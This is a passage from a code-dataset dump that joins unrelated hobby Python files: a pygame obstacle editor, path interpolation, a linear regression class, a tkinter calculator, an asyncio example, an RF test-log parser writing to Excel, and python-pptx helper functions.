if event.key == pygame.K_e:
obstacle_list.append(current_obstacle)
current_obstacle = list()
elif event.key == pygame.K_w:
pygame.display.set_caption("Writing to " + filename)
to_cpp(
width, height,
obstacle_list,
robot,
start_point,
end_point,
filename
)
elif event.key == pygame.K_o:
editing_obstacles = True
elif event.key == pygame.K_r:
editing_obstacles = False
elif event.type == pygame.QUIT:
to_cpp(
width, height,
obstacle_list,
robot,
start_point,
end_point,
filename)
exit()
pygame.display.flip()
def to_cpp(width, height, obstacle_list, robot, start_pos, goal_pos, filename):
with open(filename, "w") as f:
f.write("#include <vector>\n")
f.write("using namespace std;\n")
f.write("class ObstaclesInstance {};\n")
if __name__ == "__main__":
if len(sys.argv) == 4:
start(int(sys.argv[1]), int(sys.argv[2]), sys.argv[3])
else:
raise Exception("Not enough command line arguments given")
```
#### File: Dodger/scripts/path.py
```python
import point
class Path(list):
def get_max_time(self):
return self[-1].t
def __call__(self, t, index=False):
for i, p in enumerate(self):
if i == 0:
continue
if t <= p.get_t():
t_diff = p.t - self[i - 1].t
if t_diff == 0:
continue
rel_t = float(t) - self[i - 1].t
x_vel = (p.x - self[i - 1].x) / t_diff
y_vel = (p.y - self[i - 1].y) / t_diff
x_pos = self[i - 1].x + rel_t * x_vel
y_pos = self[i - 1].y + rel_t * y_vel
if index:
return point.Point(x_pos, y_pos), i
else:
return point.Point(x_pos, y_pos)
if index:
return point.Point(self[-1].x, self[-1].y), len(self) - 1
else:
return point.Point(self[-1].x, self[-1].y)
def make(*args):
return Path(*args)
``` |
{
"source": "a22057916w/General-ML",
"score": 4
} |
#### File: General-ML/linear_regression/imp.py
```python
import numpy as np
class LinearRegression():
def __init__(self, num_iteration=100, learning_rate=1e-1, feature_scaling=True):
self.num_iteration = num_iteration
self.learning_rate = learning_rate
self.feature_scaling = feature_scaling
self.M = 0 # normalize mean
self.S = 1 # normalize range
self.W = None
self.cost_history = np.empty(num_iteration)
def fit(self, X, y):
# m 為資料筆數,n 為特徵數量
if X.ndim == 1:
X = X.reshape(X.shape[0], 1)
m, n = X.shape
# 是否進行正規化
if self.feature_scaling:
X = self.normalize(X)
# 在 X 左方加入一行 1 對應到參數 theta 0
X = np.hstack((np.ones((m, 1)), X))
y = y.reshape(y.shape[0], 1)
self.W = np.zeros((n+1,1))
# 每個 iteration 逐步更新參數
for i in range(self.num_iteration):
y_hat = X.dot(self.W)
cost = self.cost_function(y_hat, y, m)
self.cost_history[i] = cost
self.gradient_descent(X, y_hat, y, m)
def normalize(self, X):
self.M = np.mean(X, axis=0)
self.S = np.max(X, axis=0) - np.min(X, axis=0)
return (X - self.M) / self.S
def cost_function(self, y_hat, y, m):
return 1/(2*m) * np.sum((y_hat - y)**2)
def compute_gradient(self, X, y_hat, y, m):
return 1/m * np.sum((y_hat - y) * X, axis=0).reshape(-1,1)
def gradient_descent(self, X, y_hat, y, m):
self.W -= self.learning_rate * self.compute_gradient(X, y_hat, y, m)
def predict(self, X):
if X.ndim == 1:
X = X.reshape(X.shape[0], 1)
m, n = X.shape
if self.normalize:
X = (X - self.M) / self.S
X = np.hstack((np.ones((m, 1)), X))
y_hat = X.dot(self.W)
return y_hat
def normal_equation(self, X, y):
if X.ndim == 1:
X = X.reshape(X.shape[0], 1)
m, n = X.shape
X = np.hstack((np.ones((m, 1)), X))
y = y.reshape(y.shape[0], 1)
self.W = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(y)
``` |
{
"source": "a22057916w/python_advance",
"score": 3
} |
#### File: python_advance/adv_cal/cal_v3.py
```python
import tkinter as tk
from tkinter import messagebox
import re
import math
import os
from time import strftime, localtime
import codecs # log output for windows `
# ------------------ log function ---------------------
def printLog(strLogMsg):
print(strLogMsg)
fileLog = codecs.open("./cal_v3.log", 'a', "utf-8")
fileLog.write("[%s]%s\n" % (getDateTimeFormat(), strLogMsg))
fileLog.close()
def getDateTimeFormat():
strDateTime = "%s" % (strftime("%Y/%m/%d %H:%M:%S", localtime()))
return strDateTime
class Calculator():
def __init__(self):
printLog("[I][__init__] Iniiating the Calculator")
self.window = tk.Tk()
self.window.title("Calculator")
self.window.geometry("800x400") # set window size
self.window.resizable(0, 0) # set window fixed
# 讓grid column and row可隨視窗放大, grid size: 4x6
for i in range(5):
self.window.columnconfigure(i, weight=1)
for i in range(6):
self.window.rowconfigure(i, weight=1)
# 將 StringVar 變數與 Tkinter 控制元件關聯後,修改 StringVar 變數後,Tkinter 將自動更新此控制元件
self.strEqua = tk.StringVar()
# 儲存算式然後 set 到 strEqua
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = False
# 使用Entry顯示計算值
self.entResult = tk.Entry(self.window, textvariable=self.strEqua, state=tk.DISABLED, justify="right") # "state=tk.DISABLED" will not allow user to input, "justify="right"" aligns the text to the right
self.entResult.config(disabledbackground=self.window["bg"], font=12) # set disabledbackground colour
self.entResult.grid(row = 0, column = 0, columnspan=5, ipadx=70, sticky=tk.NW+tk.SE)
# -------- setup buttons of number ---------
self.btnZero = tk.Button(self.window, width=20, text="0", font=12, command=lambda:self.pressNum("0"))
self.btnZero.grid(row=5, column=0, columnspan=2, sticky=tk.NW+tk.SE)
self.btnOne = tk.Button(self.window, width=20, text="1", font=12, command=lambda:self.pressNum("1"))
self.btnOne.grid(row=4, column=0, sticky=tk.NW+tk.SE)
self.btnTwo = tk.Button(self.window, width=20, text="2", font=12, command=lambda:self.pressNum("2"))
self.btnTwo.grid(row=4, column=1, sticky=tk.NW+tk.SE)
self.btnThree = tk.Button(self.window, width=20, text="3", font=12, command=lambda:self.pressNum("3"))
self.btnThree.grid(row=4, column=2, sticky=tk.NW+tk.SE)
self.btnFour = tk.Button(self.window, width=20, text="4", font=12, command=lambda:self.pressNum("4"))
self.btnFour.grid(row=3, column=0, sticky=tk.NW+tk.SE)
self.btnFive = tk.Button(self.window, width=20, text="5", font=12, command=lambda:self.pressNum("5"))
self.btnFive.grid(row=3, column=1, sticky=tk.NW+tk.SE)
self.btnSix = tk.Button(self.window, width=20, text="6", font=12, command=lambda:self.pressNum("6"))
self.btnSix.grid(row=3, column=2, sticky=tk.NW+tk.SE)
self.btnSeven = tk.Button(self.window, width=20, text="7", font=12, command=lambda:self.pressNum("7"))
self.btnSeven.grid(row=2, column=0, sticky=tk.NW+tk.SE)
self.btnEight = tk.Button(self.window, width=20, text="8", font=12, command=lambda:self.pressNum("8"))
self.btnEight.grid(row=2, column=1, sticky=tk.NW+tk.SE)
self.btnNine = tk.Button(self.window, width=20, text="9", font=12, command=lambda:self.pressNum("9"))
self.btnNine.grid(row=2, column=2, sticky=tk.NW+tk.SE)
# -------- setup buttons of alrithmatic ---------
self.btnAdd = tk.Button(self.window, width=20, text="+", font=12, command=lambda:self.pressArithm("+"))
self.btnAdd.grid(row=5, column=3, sticky=tk.NW+tk.SE)
self.btnSub = tk.Button(self.window, width=20, text="-", font=12, command=lambda:self.pressArithm("-"))
self.btnSub.grid(row=4, column=3, sticky=tk.NW+tk.SE)
self.btnMult = tk.Button(self.window, width=20, text="*", font=12, command=lambda:self.pressArithm("*"))
self.btnMult.grid(row=3, column=3, sticky=tk.NW+tk.SE)
self.btnDiv = tk.Button(self.window, width=20, text="/", font=12, command=lambda:self.pressArithm("/"))
self.btnDiv.grid(row=2, column=3, sticky=tk.NW+tk.SE)
self.btnMod = tk.Button(self.window, width=20, text="%", font=12, command=lambda:self.pressArithm(
"%"))
self.btnMod.grid(row=1, column=3, sticky=tk.NW+tk.SE)
# ------- setup special operation buttons ---------
self.btnRoot = tk.Button(self.window, width=20, text="\u221A", font=12, command=lambda:self.pressRoot())
self.btnRoot.grid(row=1, column=4, sticky=tk.NW+tk.SE)
self.btnSquare = tk.Button(self.window, width=20, text="x\u00B2", font=12, command=lambda:self.pressSquare())
self.btnSquare.grid(row=2, column=4, sticky=tk.NW+tk.SE)
self.btnCube = tk.Button(self.window, width=20, text="x\u00B3", font=12, command=lambda:self.pressCube())
self.btnCube.grid(row=3, column=4, sticky=tk.NW+tk.SE)
self.btnFact = tk.Button(self.window, width=20, text="n!", font=12, command=lambda:self.pressFact())
self.btnFact.grid(row=4, column=4, sticky=tk.NW+tk.SE)
# -------- setup buttons of other operations ---------
self.btnEqu = tk.Button(self.window, width=20, text="=", font=12, command=lambda:self.pressEqu(""))
self.btnEqu.grid(row=5, column=4, sticky=tk.NW+tk.SE)
self.btnDec = tk.Button(self.window, width=20, text=".", font=12, command=lambda:self.pressDec())
self.btnDec.grid(row=5, column=2, sticky=tk.NW+tk.SE)
self.btnClear = tk.Button(self.window, width=20, text="AC", font=12, command=lambda:self.pressClear())
self.btnClear.grid(row=1, column=0, sticky=tk.NW+tk.SE)
self.btnMinus = tk.Button(self.window, width=20, text="+/-", font=12, command=lambda:self.pressMinus())
self.btnMinus.grid(row=1, column=2, sticky=tk.NW+tk.SE)
self.btnErase = tk.Button(self.window, width=20, text="\u232B", font=12, command=lambda:self.pressErase())
self.btnErase.grid(row=1, column=1, sticky=tk.NW+tk.SE)
# ------------------ method of button events -------------------------
# handling the button events of numbers
def pressNum(self, strNum):
printLog("[I][pressNum] The button %s has been pressed" % strNum)
# if the expression has been evaluated, reset the experssion to strNum
if self.bEvaluated:
self.strExpr = strNum
self.strEqua.set(self.strExpr)
self.bEvaluated = False
return
# if the expression is single digit
if len(self.strExpr) < 2:
# if the expression is 0, simply change it to strNum
if self.strExpr == "0":
self.strExpr = strNum
# else, concatenation the expression and strNum
else:
self.strExpr += strNum
# if the length of expression >= 2
else:
# make sure there can not be equation like 3+02, should be 3+2
if self.hasOp(self.strExpr[-2]) and self.strExpr[-1] == "0":
self.strExpr = self.strExpr[:-1] + strNum
# concatenation the expression and pressed button var
else:
self.strExpr += strNum
self.strEqua.set(self.strExpr)
# handling the alrithmatic buttons
def pressArithm(self, strOp):
printLog("[I][pressArithm] The button %s has been pressed" % strOp)
# if the last char is op or ".", repalace with strOp
if self.hasOp(self.strExpr[-1]) or self.strExpr[-1] == ".":
self.strExpr = self.strExpr[:-1] + strOp
# if the op is in the expression and not in the last pos, do calculation
elif self.hasOp(self.strExpr):
self.pressEqu("pressArithm")
self.strExpr += strOp
# concatenation the expression and alrithmatic button
else:
self.strExpr += strOp
self.strEqua.set(self.strExpr)
# There must be an operator in the expression after the action
# Therefore, there must be an evaluation after
self.bEvaluated = False
def pressRoot(self):
printLog("[I][pressRoot] The button \u221A has been pressed")
try:
# if the last char is op, remove it
if self.hasOp(self.strExpr[-1]):
self.strExpr = self.strExpr[:-1]
# split expression by ops for examle, 123+4 goes to [123, 4]. Then
# get the number last number(4) and calculate
strLast = re.split(r'\+|-|\*|\/|%', self.strExpr)[-1]
strVal = str(math.sqrt(eval(strLast)))
self.strExpr = self.strExpr[:-len(strLast)] + strVal
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except OverflowError as e:
printLog("[W][pressRoot] The \u221A operation will go overflow")
messagebox.showinfo("Error", e)
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except Exception as e:
printLog("[E][pressRoot] Unexpected Error: " + e)
def pressSquare(self):
printLog("[I][pressSquare] The button x\u00B2 has been pressed")
if self.isTooLarge():
printLog("[W][pressSquare] The number is out of limit")
messagebox.showinfo("Warning", "Inf")
self.strExpr = "0"
else:
# if the last char is op, remove it
if self.hasOp(self.strExpr[-1]):
self.strExpr = self.strExpr[:-1]
strLast = re.split(r'\+|-|\*|\/|%', self.strExpr)[-1]
strVal = str(eval(strLast)**2)
self.strExpr = self.strExpr[:-len(strLast)] + strVal
self.strEqua.set(self.strExpr)
self.bEvaluated = True
def pressCube(self):
printLog("[I][pressCube] The button x\u00B3 has been pressed")
if self.isTooLarge():
printLog("[W][pressCube] The number is out of limit")
messagebox.showinfo("Warning", "Inf")
self.strExpr = "0"
else:
# if the last char is op, remove it
if self.hasOp(self.strExpr[-1]):
self.strExpr = self.strExpr[:-1]
strLast = re.split(r'\+|-|\*|\/|%', self.strExpr)[-1]
strVal = str(eval(strLast)**3)
self.strExpr = self.strExpr[:-len(strLast)] + strVal
self.strEqua.set(self.strExpr)
self.bEvaluated = True
def pressFact(self):
printLog("[I][pressFact] The button n! has been pressed")
try:
# if the last char is op, remove it
if self.hasOp(self.strExpr[-1]):
self.strExpr = self.strExpr[:-1]
strLast = re.split(r'\+|-|\*|\/|%', self.strExpr)[-1]
# if the value > 100,000, return to default value
if eval(strLast) > 1E5:
printLog("[W][pressFact] The factorial number is out of limit")
messagebox.showinfo("Error", "The factorial number is out of limit")
self.strExpr = "0"
else:
strVal = str(math.factorial(eval(strLast)))
self.strExpr = self.strExpr[:-len(strLast)] + strVal
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except ValueError as e:
printLog("[W][pressFact] The factorial number is out of limit")
messagebox.showinfo("Error", e)
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except Exception as e:
printLog("[E][pressFact] Unexpected Error: " + e)
#print(e)
def pressEqu(self, strCaller):
# check caller, "" for user press; ohterwise for called by function
if strCaller == "":
printLog("[I][pressEqu] The button = has been pressed")
else:
printLog("[I][pressEqu] PressEqu has been called by %s" % strCaller)
try:
# evaluate the expression
self.strExpr = str(eval(self.strExpr))
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except ZeroDivisionError:
printLog("[W][pressEqu] Action involves zero division")
messagebox.showinfo("Error", "Can not divide by zero") # tkinter.messagebox
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = True
# deal with invalid expression such as 8*(*(*(, then return default value
except SyntaxError:
printLog("[W][pressEqu] The expression is incomplete")
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except Exception as e:
printLog("[E][pressEqu] Unexpected Error: " + e)
#print("Unexpected Error: " + e)
def pressDec(self):
printLog("[I][pressDec] The button . has been pressed")
# if the expression has been evaluated, reset the experssion to 0
if self.bEvaluated:
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = False
return
# if the last char is operator
if self.hasOp(self.strExpr[-1]):
# if there is already "." in expression, replace op with nothing
if "." in self.strExpr:
self.strExpr = self.strExpr[:-1]
# otherwise, replace op wiht "."
else:
self.strExpr = self.strExpr[:-1] + "."
# make sure there can be two floating numbers in the expression. e.g. 3.2 + 6.4
# if three is "." in the expression after spliting by ops, do noting
elif "." in re.split(r'\+|-|\*|\/|%', self.strExpr)[-1]:
return
# otherewise, add decimal point to the expression
else:
self.strExpr = self.strExpr + "."
self.strEqua.set(self.strExpr)
def pressClear(self):
printLog("[I][pressClaer] The button AC has been pressed")
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = False
def pressMinus(self):
printLog("[I][pressMinus] The button +/- has been pressed")
if self.strExpr[0] == "-":
self.strExpr = self.strExpr[1:]
else:
self.strExpr = "-" + self.strExpr[0:]
self.strEqua.set(self.strExpr)
def pressErase(self):
printLog("[I][pressErase] The button \u232B has been pressed")
# if the expression is single digit or something else, set to 0(default)
if len(self.strExpr) < 2:
self.strExpr = "0"
else:
self.strExpr = self.strExpr[:-1]
self.strEqua.set(self.strExpr)
# ------------------ end of method of button events -----------------------
def isTooLarge(self):
return True if len(self.strExpr) > 200 else False
def hasOp(self, strOp):
listOps = ["+", "-", "*", "/", "%"]
return 1 in [op in strOp for op in listOps]
def mainloop(self):
printLog("[I][mainloop] Start the Calculator")
self.window.mainloop()
if __name__ == '__main__':
printLog("[I][__main__] Process Start")
# new an instance of a Calculator then start it
cal = Calculator()
cal.mainloop()
printLog("[I][__main__] End of process")
```
#### File: python_advance/Asynchronous/task.py
```python
import asyncio
import time
async def nested():
return 42
async def main():
# Schedule nested() to run soon concurrently
# with "main()".
task = asyncio.create_task(nested())
# "task" can now be used to cancel "nested()", or
# can simply be awaited to wait until it is complete:
print(await task)
asyncio.run(main())
print("Finish")
```
#### File: python_advance/LogParser/LTEV2.py
```python
import re
import os
import sys
import pandas as pd
import codecs
import time
import configparser
import openpyxl
from openpyxl.utils.dataframe import dataframe_to_rows
from openpyxl.styles import Font, Fill, colors
from openpyxl.formatting.rule import CellIsRule
# [Main]
g_strVersion = "3.0.0.1"
#[ParseLogPath]
g_strLogDir = "./Log/Pass"
class cLogParser:
listKey = ["Power_dBm_CH15", "Power_dBm_CH21", "Power_dBm_CH24", "Current_mA_CH15", "Current_mA_CH21", "Current_mA_CH24", "dBm_LNA_ON", "dBm_LNA_Off",
"Current_mA_3G_CH9750", "Current_mA_3G_CH2787", "Current_mA_2G_CH124", "dBm_CH9750", "dBm_CH2787", "dBm_2G_CH124", "dBm_CH124"]
listInfo, listLTE, listZigbee = [], [], []
def __init__(self):
# get directory names of TryingLog (first layer)
listSN = os.listdir(g_strLogDir)
# iterate through log files in a SN folder (second layer)
self.parseLog(listSN)
# merge data from two different log files
self.mergeLogs()
def parseLog(self, listSN):
printLog("[I][parseLog] ------- Start Parsing Log -------")
strLTEName, strZigbeeName = "GFI20_RF_LTE.log", "GFI20_RF_Zigbee.log"
try:
for strSN in listSN:
dictLTE = {
"SN" : strSN,
"dBm_CH9750" : None,
"dBm_CH2787" : None,
"dBm_2G_CH124" : None,
"Current_mA_3G_CH9750" : None,
"Current_mA_3G_CH2787" : None,
"Current_mA_2G_CH124" : None,
"dBm_CH124" : None }
dictZigbee = {
"SN" : strSN,
"Power_dBm_CH15" : None,
"Power_dBm_CH21" : None,
"Power_dBm_CH24" : None,
"dBm_LNA_ON" : None,
"dBm_LNA_Off" : None,
"Current_mA_CH15" : None,
"Current_mA_CH21" : None,
"Current_mA_CH24" : None }
b_hasLTE, b_hasZigbee = False, False # flag for checking if the target log exists
strSNLog = os.path.join(g_strLogDir, strSN) # set abspath for SN logs
for strLogName in os.listdir(strSNLog):
strLogPath = os.path.join(strSNLog, strLogName)
# check GFI20_RF_LTE.log exists. If not, flag = False and parse only SN.
reMatch = re.fullmatch("^.*RF_LTE\.log", strLogName)
if(reMatch != None):
self.parseLTE(dictLTE, strLogPath, strSN)
b_hasLTE = True
# parse GFI20_RF_Zigbee.log files
reMatch = re.fullmatch("^.*RF_Zigbee\.log", strLogName)
if(reMatch != None):
self.parseZigbee(dictZigbee, strLogPath, strSN)
b_hasZigbee = True
# if log not exists, append initial dict
self.listLTE.append(dictLTE)
self.listZigbee.append(dictZigbee)
# if there is no target log file in the folder, parse only SN
if not b_hasLTE:
#listLTE.append({"SN": strSN})
printLog("[W][ParseLog] Cannot find log: %s" % os.path.join(strSN, strLTEName))
if not b_hasZigbee:
#listZigbee.append({"SN" : strSN})
printLog("[W][ParseLog] Cannot find log: %s" % os.path.join(strSN, strZigbeeName))
printLog("[I][parseLog] ------- Finish Parsing Log -------")
except Exception as e:
printLog("[E][parseLog] Unexpected Error: " + str(e))
def parseLTE(self, dictLTE, strLTEPath, strSN):
printLog("[I][parseLTE] Parse LTE log: %s" % strLTEPath)
try:
listPostfix = [" \n", " A\n", " dBm\n"]
with open(strLTEPath, encoding='big5') as log: # big5 for windows
content = log.readlines()
for line in content:
re_power = "Power: [+-]?[0-9]+\.?[0-9]*"
re_current = "Current: [+-]?[0-9]+\.?[0-9]* A"
re_RX_RSSI = "Rx RSSI: [+-]?[0-9]+\.?[0-9]* dBm"
if re.search("-+ LTE_3G Freq 897.4 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[11], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[8], listPostfix[1], 1000, False)
if re.search("-+ LTE_3G Freq 1950 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[12], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[9], listPostfix[1], 1000, False)
if re.search("-+ LTE_2G Freq 914.8 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[13], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[10], listPostfix[1], 1000, False)
if re.search("-+ LTE_2G Freq 959.8 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_RX_RSSI, self.listKey[14], listPostfix[2], 1, True)
except Exception as e:
printLog("[E][parseLTE] Unexpected Error: " + str(e))
def parseZigbee(self, dictZigbee, strZigBeePath, strSN):
printLog("[I][parseZigbee] Parse Zigbee log: %s" % strZigBeePath)
try:
listPostfix = ["dBm\n", " A\n", " dBm\n"]
with open(strZigBeePath, encoding="big5") as Zigbee: # big5 for windows
content = Zigbee.readlines()
for line in content:
re_power = "Power: [+-]?[0-9]+\.?[0-9]* dBm"
re_current = "Current: [+-]?[0-9]+\.?[0-9]* A"
re_RX_RSSI = "Rx RSSI: [+-]?[0-9]+\.?[0-9]* dBm"
if re.search("-+ ZIGBEE_2450 Freq 2425 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[0], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[3], listPostfix[1], 1000, False)
if re.search("-+ ZIGBEE_2450 Freq 2455 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[1], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[4], listPostfix[1], 1000, False)
if re.search("-+ ZIGBEE_2450 Freq 2470 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[2], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[5], listPostfix[1], 1000, False)
if re.search("-+ LNA ON -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_RX_RSSI, self.listKey[6], listPostfix[2], 1, False)
if re.search("-+ LNA OFF -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_RX_RSSI, self.listKey[7], listPostfix[2], 1, False)
except Exception as e:
printLog("[E][parseZigbee] Unexpected Error: " + str(e))
def get_log_value(self, cut_content, dictInfo, re_target, strKey, strPostfix, nUnit, b_getMulti):
for line in cut_content:
# search pattern like "Power: (int/float) dBm"
if re.search(re_target, line) != None:
# get the figure of the line like "Power: 8.817 dBm\n"
fValue = eval(line.split(": ")[1].strip(strPostfix))
dictInfo[strKey] = fValue * nUnit
if not b_getMulti:
break;
# merge two list of dict to single list of dict
def mergeLogs(self):
try:
printLog("[I][mergeLogs] ------- Merging two Log data -------")
# listLTE and listZigbee both has same length
self.listInfo = [None] * len(self.listLTE)
for i in range (0, len(self.listLTE)):
self.listLTE[i].update(self.listZigbee[i]) # merge two dict
self.listInfo[i] = self.listLTE[i]
printLog("[I][mergeLogs] ------- Merged two Log data -------")
except Exception as e:
printLog("[E][mergeLogs] Unexpected Error: " + str(e))
#/====================================================================\#
#| Functions of parsing log to excel |#
#\====================================================================/#
def log_to_excel(self):
printLog("[I][log_to_excel] ------- Parsing Log to Excel -------")
dictThreshold = {} # store INI threshold ata for setting conditional formating
try:
# ========== get the threshold data from INI ==========
printLog("[I][log_to_excel] ----- INI reading -----")
for key in self.listKey:
dictThreshold[key] = self.readINI(key)
printLog("[I][log_to_excel] ----- INI read -----")
# ========== New Excel workbook and sheets ==========
df_logInfo = pd.DataFrame(self.listInfo) # listInfo -> list of dict
listSheetName = ["Zigbee_Power_Current", "Zigbee_LAN", "LTE_Current", "LTE_dBm"]
listCol = [self.listKey[:6], self.listKey[6:8], self.listKey[8:11], self.listKey[11:15]] # columns for each sheet above
wb = openpyxl.Workbook() # 新增 Excel 活頁
wb.remove(wb['Sheet']) # remove the default sheet when start a workbook
printLog("[I][log_to_excel] ----- Excel Sheet Creating -----")
for i in range(0, len(listSheetName)):
self.newSheet(wb, listSheetName[i], df_logInfo[["SN"] + listCol[i]])
printLog("[I][log_to_excel] ----- Excel Sheet Created -----")
# modify cell font-color according to thershold that parsed from INI
self.set_threshold_to_excel(wb, dictThreshold)
wb.save('LTEV2.xlsx') # save the worksheet as excel file
printLog("[I][log_to_excel] ------- Parsed Log to Excel -------")
except Exception as e:
printLog("[E][log_to_excel] Unexpected Error: " + str(e))
# read INI values one by one by giving keys, then store to var dictThreshold
def readINI(self, strKey):
try:
config = configparser.ConfigParser()
config.read(g_strINIPath)
strMethod = 'Method%s' % g_nMethodIndex
strValue = config.get(strMethod, strKey)
# search pattern like "+-(int/float),+-(int/float)"
if re.fullmatch("[+-]?[0-9]+\.?[0-9]*,[+-]?[0-9]+\.?[0-9]*", strValue):
printLog("[I][readINI] %s = %s" % (strKey, strValue))
return strValue
else:
printLog("[W][readINI] Read %s Fail !!" % strKey)
sys.exit("Read %s Fail !!" % strKey)
except Exception as e:
printLog("[E][readINI] Error: %s" % str(e))
sys.exit("Error: %s" % str(e))
# new worksheets by DataFrame
def newSheet(self, workbook, strSheetName, df_SheetCol):
try:
workbook.create_sheet(strSheetName)
for row in dataframe_to_rows(df_SheetCol, index=False, header=True):
workbook[strSheetName].append(row)
printLog("[I][newSheet] Sheet: %s Created" % strSheetName)
except Exception as e:
printLog("[E][newSheet] Unexpected Error: " + str(e))
# set conditional formating for sheets by dictionay containg thershold data
def set_threshold_to_excel(self, workbook, dictThreshold):
try:
printLog("[I][set_threshold_to_excel] ----- threshold setting -----")
# iterate through every worksheet to set conditional formatting
for ws in workbook.worksheets:
printLog("[I][set_threshold_to_excel] setting worksheet: %s" % ws.title)
# iterate from Col 2 since Col 1 is the Serial Number(SN)
for col in ws.iter_cols(min_row=1, max_row=ws.max_row, min_col=2, max_col=ws.max_column):
strStart, strEnd = None, None # set the test range for cell e.g. A1:A10
istInterval = [] # set the threshold range for the formula below
# check the column is not empty, col[0] is column name
if len(col) > 1:
strStart = col[1].coordinate # set starting cell for thershold testing
strEnd = col[-1].coordinate # set ending cell
# get the thershold and store as interval for the formula below
strThreshold = dictThreshold[col[0].value] # get the test thershold by the column name(col[0])
listInterval = strThreshold.split(",")
red_text = Font(color="9C0006") # font-color: RED
range_string = "%s:%s" % (strStart, strEnd) # the value would be like A1:A10
ws.conditional_formatting.add(range_string,
CellIsRule(operator='notBetween', formula=listInterval, stopIfTrue=True, font=red_text))
printLog("[I][set_threshold_to_excel] ----- threshold set -----")
except Exception as e:
printLog("[E][set_threshold_to_excel] Unexpected Error: " + str(e))
#/====================================================================\#
#| Functions of printing log of LTE.py |#
#\====================================================================/#
def getDateTimeFormat():
strDateTime = "[%s]" % (time.strftime("%Y/%m/%d %H:%M:%S", time.localtime()))
return strDateTime
def printLog(strPrintLine):
strFileName = os.path.basename(__file__).split('.')[0]
fileLog = codecs.open(g_strFileName + ".log", 'a', "utf-8")
print(strPrintLine)
fileLog.write("%s%s\r\n" % (getDateTimeFormat(), strPrintLine))
fileLog.close()
if __name__ == "__main__":
global g_strFileName, g_strINIPath, g_nMethodIndex
g_strFileName = os.path.basename(__file__).split('.')[0]
g_strINIPath = os.path.join(os.getcwd(), g_strFileName + ".ini")
g_nMethodIndex = 1
printLog("========== Start ==========")
printLog("[I][main] Python " + sys.version)
printLog("[I][main] %s.py %s" % (g_strFileName, g_strVersion))
# ------------ find the target file --------------
try:
LogParser = cLogParser()
LogParser.log_to_excel()
except Exception as e:
printLog("[E][main] Unexpected Error: " + str(e))
printLog("========== End ==========")
```
#### File: pptx/script/PPTX_FEATURE.py
```python
import os, sys
import pandas as pd
import collections
import collections.abc
# the above packages are required for importing pptx, on Python 3.10.X+
from pptx import Presentation
from pptx.util import Inches, Pt, Cm
from pptx.dml.color import RGBColor
from pptx.enum.text import PP_ALIGN, MSO_AUTO_SIZE, MSO_ANCHOR
from pptx.oxml.xmlchemy import OxmlElement
import xml.etree.ElementTree as ET
class PresentationFeature():
# new textbox and add text
@staticmethod
def add_textbox(slide, text, left=0, top=0, width=0, height=0, *, size=Pt(12)):
txBox = slide.shapes.add_textbox(Inches(left), Inches(top), width, height)
text_frame = txBox.text_frame
text_frame.word_wrap = True # for libreoffic, if not having this line, the textbox will go off the slide
p = text_frame.add_paragraph()
p.text = text
p.font.size = size
return txBox
# set text alignment inside textbox
@staticmethod
def set_textbox_alignment(textbox, horizen_type):
for paragraph in textbox.text_frame.paragraphs:
paragraph.alignment = horizen_type # set horizen alignment
# add text to a table's cell
@staticmethod
def add_text_to_cell(cell, str_text):
paragraph = cell.text_frame.paragraphs[-1]
run = paragraph.add_run()
run.text = str_text
# add text to a cell's run and new lines by the length of string_len
@staticmethod
def add_text_with_newlines(cell, list_ctry, *, string_len):
str_ctry = ""
for i in range(len(list_ctry)):
if i > 0:
str_ctry += ","
str_ctry += list_ctry[i]
if len(str_ctry) >= string_len:
paragraph = cell.text_frame.paragraphs[-1]
run = paragraph.add_run()
run.text = str_ctry + "\n"
str_ctry = ""
# setting all table cell's text size
@staticmethod
def set_table_text_size(table, *, size):
# setting font size
for col in range(len(table.columns)):
for row in range(len(table.rows)):
for cell_pt in table.cell(row, col).text_frame.paragraphs:
cell_pt.font.size = size
# setting single cell's text size
@staticmethod
def set_cell_text_size(cell, *, size):
font = cell.font
font.size = size
# set all cell's text color
@staticmethod
def set_table_text_color(table, RGBcolor):
for col in range(len(table.columns)):
for row in range(len(table.rows)):
for cell_pt in table.cell(row, col).text_frame.paragraphs:
cell_pt.font.color.rgb = RGBcolor
# new a table without formating or styling
@staticmethod
def add_table(slide, row = 0, col = 0, left = 0, top = 0):
shape = slide.shapes
left = Inches(left)
top = Inches(top)
width = height = Inches(1)
table = shape.add_table(row, col, left, top, width, height).table
